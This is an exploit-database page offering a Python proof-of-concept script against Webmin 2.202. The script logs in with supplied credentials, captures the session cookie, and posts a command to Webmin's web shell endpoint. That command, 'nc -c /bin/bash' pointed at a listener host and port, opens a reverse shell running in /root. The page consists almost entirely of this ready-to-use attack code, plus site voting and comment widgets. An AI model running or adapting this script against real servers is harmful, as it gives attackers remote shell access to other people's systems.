Webmin RCE Leading to Privilege Escalation

2025.03.05
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Webmin RCE Leading to Privilege Escalation # Google Dork: N/A # Date: 05-03-2025 # Exploit Author: Buğra Enis Dönmez # Vendor Homepage: https://webmin.com/ # Software Link: https://webmin.com/ # Version: 2.202 # Tested on: Windows # Python POC import requests import argparse import sys import time def main(): parser = argparse.ArgumentParser() parser.add_argument("-rhost", required=True, help="Target IP address") parser.add_argument("-rport", required=True, help="Target port") parser.add_argument("-u", required=True, help="Username") parser.add_argument("-p", required=True, help="Password") parser.add_argument("-lhost", required=True, help="Listener IP address") parser.add_argument("-lport", required=True, help="Listener port") args = parser.parse_args() login_url = f"https://{args.rhost}:{args.rport}/session_login.cgi" command_url = f"https://{args.rhost}:{args.rport}/shell/index.cgi" login_data = { "user": args.u, "pass": args.p } headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", "Referer": f"https:// {args.rhost}:{args.rport}/session_login.cgi?logout=1", "Origin": f"https://{args.rhost}:{args.rport}", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1", "Cookie": "redirect=1; testing=1; sid=x" } session = requests.Session() try: print("Attempting to log in...") time.sleep(2) response = session.post(login_url, headers=headers, data=login_data, verify=False, allow_redirects=False) if response.status_code == 302: set_cookie_header = response.headers.get("Set-Cookie") if set_cookie_header and "sid=" in set_cookie_header: sid = set_cookie_header.split("sid=")[1].split(";")[0] print("Login successful!") time.sleep(2) headers["Cookie"] = f"redirect=1; testing=1; sid={sid}" print(f"Check your listener on {args.lhost}:{args.lport}") time.sleep(2) boundary = "---------------------------30454280098212925122759899223" payload = f"nc -c /bin/bash {args.lhost} {args.lport}" command_data = ( f"{boundary}\r\n" f"Content-Disposition: form-data; name=\"cmd\"\r\n\r\n{payload}\r\n" f"{boundary}\r\n" f"Content-Disposition: form-data; name=\"pwd\"\r\n\r\n/root\r\n" f"{boundary}\r\n" f"Content-Disposition: form-data; name=\"history\"\r\n\r\n\r\n" f"{boundary}--\r\n" ) headers["Content-Type"] = f"multipart/form-data; boundary={boundary.strip('-')}" session.post(command_url, headers=headers, data=command_data, verify=False) sys.exit(0) else: print("Login failed: SID not found.") sys.exit(1) else: print("Login failed.") sys.exit(1) except requests.exceptions.RequestException as e: print("An error occurred during the request.") sys.exit(1) except Exception as e: print(f"An unexpected error occurred: {e}") sys.exit(1) if __name__ == "__main__": requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) main()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top